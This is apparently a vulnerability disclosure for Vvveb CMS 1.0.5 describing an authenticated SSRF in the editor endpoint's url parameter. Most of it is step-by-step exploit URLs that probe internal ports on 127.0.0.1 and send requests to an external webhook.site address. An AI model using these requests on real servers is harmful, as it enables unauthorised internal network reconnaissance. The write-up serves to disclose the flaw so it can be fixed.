Vvveb 1.0.5 | Authenticated SSRF port scanning as an editor

The endpoint [/vadmin123/?module=editor/editor&name=] is used for modifying a page using a drag and drop editor.
The issue is that an attacker can pass arbitrary URLs that the web app will attempt to load a given URL. This can be used to perform Server-Side Request Forgery (SSRF) and use it for internal port scanning.

This endpoint is accessible to “Editors” or anyone with privileges to modify posts or pages.

Login as an editor & open the following endpoint:
/vadmin123/index.php?module=content/posts&type=post

Open a post of your choice in “Design” mode where you can perform drag and drop, you may get an endpoint like this:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Etiam+leo+nibh%2C+consectetur+nec+orci+et%2C+tempus+tempus+ex&url=//127.0.0.1/hello-world-4&template=content/post.html

For simplicity, I have changed the name of my post to shorten the URL. To perform SSRF, modify the URL to something like this:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/

This will open the index page of Vvveb for you. You can also open other pages like contact:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/page/contact

To use this for port scanning, you can simply change port 80 to a non-existent port like 9999:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:9999/

In this case, you get the following error:
Firefox Can’t Open This Page
To protect your security, 127.0.0.1 will not allow Firefox to display the page if another site has embedded it. To see this page, you need to open it in a new window.

This is normal. Now to test whether you can actually be sure that you can scan internal ports, create a dummy PHP server:
$ php -S 0.0.0.0:10001

Peform connection:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:10001/

You will get requests in your PHP CLI and you will also see the following page load:
The requested resource /?theme=landing&r=0.5980099159582586 was not found on this server.

In a real world scenario, we won't have access to an internal PHP server. But you can also send external HTTP requests to sites like webhook.site:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//webhook.site/xxxxxxxxxxxxxxxxxxxxxxx

Response on page:
This URL has no default content configured. View in Webhook.site.

To perform port scanning, you can keep changing the port until you figure out internal services that are running and actually see them.